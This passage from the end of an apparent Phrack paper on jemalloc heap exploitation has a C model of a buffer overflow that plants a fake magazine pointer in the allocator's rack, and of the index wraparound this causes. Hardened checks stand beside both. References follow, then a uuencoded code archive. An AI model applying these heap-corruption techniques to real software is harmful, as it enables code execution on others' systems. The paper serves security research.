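are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model constants; "assumed"/"constructed" values are not from the article. */
#define REGION_SIZE      256u        /* bin serving malloc(256) and the 240-byte rack */
#define NBINS            30u         /* 'nbins' in the gdb session */
#define BIN_MAGS_SIZE    8u          /* assumed: 'curmag' plus one more 32-bit pointer */
#define RACK_OFF         REGION_SIZE /* model: the rack is the region right after 'v' */
#define FAKE_ADDR        0xbfbfedd6u /* FAKE_MAG_T address printed in the article's run */
#define MODEL_MAX_ROUNDS 1024u       /* assumed magazine capacity */
#define ARENA_LO         0x28300000u /* constructed bounds of allocator-owned memory */
#define ARENA_HI         0x28400000u
/* The three words exploit-mag.c stores in FAKE_MAG_T; FAKE_MAG[1] is 'nrounds'. */
static const uint32_t FAKE_MAG[3] = { 0x42424242u, 0xffffffffu, 0x41414141u };

/* Input as exploit-mag.c prepares it: 256 copies of one 32-bit address + NUL. */
static void build_input(char out[1025], uint32_t addr)
{
    for (unsigned i = 0; i < 256; i++)
        memcpy(out + 4u * i, &addr, sizeof addr);
    out[1024] = '\0';
}

/* strcpy() as in vuln-mag.c, confined to the model buffer 'run'. */
static void copy_unchecked(unsigned char *run, size_t run_size, const char *src)
{
    size_t n = strlen(src) + 1;
    memcpy(run, src, n < run_size ? n : run_size);
}

/* Hardened form: refuse input that does not fit the 256-byte region. */
static int copy_checked(unsigned char *run, const char *src)
{
    size_t n = strlen(src) + 1;
    if (n > REGION_SIZE) return -1;
    memcpy(run, src, n);
    return 0;
}

/* Integrity check: how many 'curmag' slots of the modelled rack hold 'addr'? */
static unsigned rack_hits(const unsigned char *run, uint32_t addr)
{
    unsigned hits = 0;
    for (unsigned i = 0; i < NBINS; i++) {
        uint32_t curmag;
        memcpy(&curmag, run + RACK_OFF + i * BIN_MAGS_SIZE, sizeof curmag);
        hits += (curmag == addr);
    }
    return hits;
}

/* Run one copy against a zeroed two-region model; return corrupted slot count. */
static unsigned overflow_demo(int checked)
{
    unsigned char run[2048] = {0};
    char in[1025];
    build_input(in, FAKE_ADDR);
    if (checked) (void)copy_checked(run, in);
    else copy_unchecked(run, sizeof run, in);
    return rack_hits(run, FAKE_ADDR);
}

/* Assumed pop: decrement 'nrounds', then index the pointer array with it.
 * Address arithmetic wraps modulo 2^32, as it does on i386. */
static int pop_unchecked(uint32_t mag_addr, const uint32_t mag[3], uint32_t *region)
{
    if (mag[1] == 0) return -1;                 /* empty magazine */
    uint32_t idx = mag[1] - 1u;
    uint32_t slot = (uint32_t)(mag_addr + 8u + (uint32_t)(4u * idx));
    uint32_t off = (uint32_t)(slot - mag_addr);
    if (off > 8u) return -2;                    /* outside the 12 modelled bytes */
    *region = mag[off / 4u];
    return 0;
}

/* Hardened pop: bound the count, then require the region to be allocator memory. */
static int pop_checked(uint32_t mag_addr, const uint32_t mag[3], uint32_t *region)
{
    uint32_t r;
    if (mag[1] > MODEL_MAX_ROUNDS) return -3;   /* count exceeds capacity */
    int rc = pop_unchecked(mag_addr, mag, &r);
    if (rc != 0) return rc;
    if (r < ARENA_LO || r >= ARENA_HI) return -4; /* pointer not in the arena */
    *region = r;
    return 0;
}

int main(void)
{
    uint32_t r = 0;
    int rc = pop_unchecked(FAKE_ADDR, FAKE_MAG, &r);
    printf("rack slots hit: unchecked=%u checked=%u\n", overflow_demo(0), overflow_demo(1));
    printf("unchecked pop: rc=%d region=0x%08x\n", rc, (unsigned)r);
    printf("checked pop:   rc=%d\n", pop_checked(FAKE_ADDR, FAKE_MAG, &r));
    return 0;
}
```

With 'nrounds' at 0xffffffff the decremented index wraps the slot address
back to the first word of the structure, which is why 'p2' comes back as
0x42424242 in the run above; the bound on 'nrounds' rejects that magazine.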


--[ 4 - A real vulnerability

For a detailed case study on jemalloc heap overflows see the second Art of
Exploitation paper in this issue of Phrack.


--[ 5 - Future work

This paper is the first public treatment of jemalloc that we are aware
of. In the near future, we are planning to research how one can corrupt
the various red black trees used by jemalloc for housekeeping. The rbtree
implementation (defined in rb.h) is fully based on preprocessor macros
and it's quite complex in nature. Although we have already debugged them,
due to lack of time we didn't attempt to exploit the various tree
operations performed on rbtrees. We hope that someone will continue our
work from where we left off. If no one does, then you definitely know whose
articles you'll soon be reading :)


--[ 6 - Conclusion

We have taken the first step in analyzing jemalloc. We do know, however,
that we have not covered every possibility of corrupting the
allocator in a controllable way. We hope to have helped those that were
about to study the FreeBSD userspace allocator or the internals of Firefox
but wanted to have a first insight before doing so. Any reader that
discovers mistakes in our article is advised to contact us as soon as
possible and let us know.

Many thanks to the Phrack staff for their comments. Also, thanks to George
Argyros for reviewing this work and making insightful suggestions.

Finally, we would like to express our respect to Jason Evans for such a
leet allocator. No, that isn't ironic; jemalloc is, in our opinion, one of
the best (if not the best) allocators out there.


--[ 7 - References

[JESA]  Standalone jemalloc
        - http://www.canonware.com/cgi-bin/gitweb.cgi?p=jemalloc.git

[JEMF]  Mozilla Firefox jemalloc
        - http://hg.mozilla.org/mozilla-central/file/tip/memory/jemalloc

[JEFB]  FreeBSD 8.2-RELEASE-i386 jemalloc
        - http://www.freebsd.org/cgi/cvsweb.cgi/src/lib/libc/stdlib/
            malloc.c?rev=1.183.2.5.4.1;content-type=text%2Fplain;
            only_with_tag=RELENG_8_2_0_RELEASE

[JELX]  Linux port of the FreeBSD jemalloc
        - http://www.canonware.com/download/jemalloc/
            jemalloc_linux_20080828a.tbz

[JE06]  Jason Evans, A Scalable Concurrent malloc(3) Implementation for
            FreeBSD
        - http://people.freebsd.org/~jasone/jemalloc/bsdcan2006
            /jemalloc.pdf

[PV10]  Peter Vreugdenhil, Pwn2Own 2010 Windows 7 Internet Explorer 8
            exploit
        - http://vreugdenhilresearch.nl
            /Pwn2Own-2010-Windows7-InternetExplorer8.pdf

[FENG]  Alexander Sotirov, Heap Feng Shui in Javascript
        - http://www.phreedom.org/research/heap-feng-shui/
            heap-feng-shui.html

[HOEJ]  Mark Daniel, Jake Honoroff, Charlie Miller, Engineering Heap
            Overflow Exploits with Javascript
        - http://securityevaluators.com/files/papers/isewoot08.pdf

[CVRS]  Chris Valasek, Ryan Smith, Exploitation in the Modern Era
            (Blueprint)
        - https://www.blackhat.com/html/bh-eu-11/
            bh-eu-11-briefings.html#Valasek

[VPTR]  rix, Smashing C++ VPTRs
        - http://www.phrack.org/issues.html?issue=56&id=8

[HAPF]  huku, argp, Patras Heap Massacre
        - http://fosscomm.ceid.upatras.gr/

[APHN]  argp, FreeBSD Kernel Massacre
        - http://ph-neutral.darklab.org/previous/0x7db/talks.html

[UJEM]  unmask_jemalloc
        - https://github.com/argp/unmask_jemalloc


--[ 8 - Code

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M$2K'<L120O6,)*<9G\3\(@!<I7<Q"N;_5\Z)8*`CO2.4KXQXS4&H)"=D!6F[
M=0J77KXB`TFI4[J!;$4;,<C:BHD`;4%??_QQ"DG+N.H6'WZBQJ1D11_+5AX(
M]3*+#7T#27N5E2[HRF;7K60,15I<?=$16^(O2%%+G=;*!#)GRQARS"5\OT4A
M;EY@81Y^4\LO<+!%!]!M6Q#?B6.VG38Q78PG>GUGCLL1F9V[_3`@T]VF[<QE
MD*33DC->0-+T8*44B5MNFS;\T^WUYB,+6/-V*0+U90PQX.]?Z<!7.O"5#MPV
M'1CX`V\^.H`U;Y<.4%_&T`'^_I4.?*4#7^G`;=.![H/YJ$#WP>W2`.C'&`J`
M7[_N_Z_[_^O^SP=WANVU^^;D:%NK++^Q]MBMDHM,2W,0#@O"K9(0NV^CB4FF
MW%>R\I6L?"4K)3$*^\O*;6>G@N?A)6H2::-1>*%!Y&$:42^.PW'VGF/K613O
MOG,0.,?#(%YA7:6/6C/".2O0,)AVY+62,+JN96*V'AZ6=?B,:EO>I"3Q\'`K
M'__4+#$B\/#AX=PF%1S,^1FK`R7SM@JO04/RO#8E+&]BJ(*!&[19Z\QN^E#`
MYT"N3A559/S@5)/(;5.`*;=7A24)7^H]OUG'1ZHL4:0EW#OAN1&^W^JXV"E1
MW:5?,'`@61>)*N]:!5*Z3RG#7>?<<]L8@@])*;D9LG*:=,7=5HNB=Z@<X3C7
M7>@,9VB7Y*@=(`GG3(6KF7!4G,B=W9Y_ZOE]/T$K#\3(3VX<>Q%:=^"\-!K'
M)\]V&@U4*K.NMPWM^D'+(PA&5>_*1Y,/#Z.#A&COX7FH*:8`73I*";=[P(MQ
MWWMSLH)&"X!;6*"QN$%29-4H'';/+;_(2HQZ:NC:"L'`8T>BJG-9F`58S<?7
M0>)>\0E6QDY39!7T1"+G<8I9@JJ]VNV<*??]#ML;,Y8H=I"8R6C,E.[3HC0^
M:0PK>^1[]VC9F)T?9:,W&(PQ.KSO/"7/4?8AP.#V&`?)QP".`XRPIIW,\Y;S
M.:4KA8.@V?J_%5XT""YV`X\0B`8`^T!<6E::4E1AXCK`B/N\?&."(:&(X93G
M?`%H5`"DZ=9F06.VU3"Z@!B>!8TF`N-A"XFD0T$ABY&HD7Z($QISE`,R?*J5
M;`JP46*5]+1H)]4U]$4H%D:Q(@"5%0?&TS@\VL4\M(V]Y[LOCW=A8Y`W&6\T
MP`(&H8K?^X.!UZY-U9[?D0#0JL,&1G3'A<(%7B[L.-!WI.=T:C.Y7[`_%QBZ
MZ4IS65;2B9,-],WO5'B3K_3W*_W]2G^_TM\_-_W]<L*DV#<'YY0([FE9%CHL
M2S^YYL4XKRO?7]M2IS2G57L7L,ZGSSEL6@PET@OA$U9BV\SJI*AC4T"88./N
M)N>-%[#F;YZ``:]^",E*OJ#A-R@&I)S7N+%?AN'`.HPPBB8=1'B^8KA(%2#1
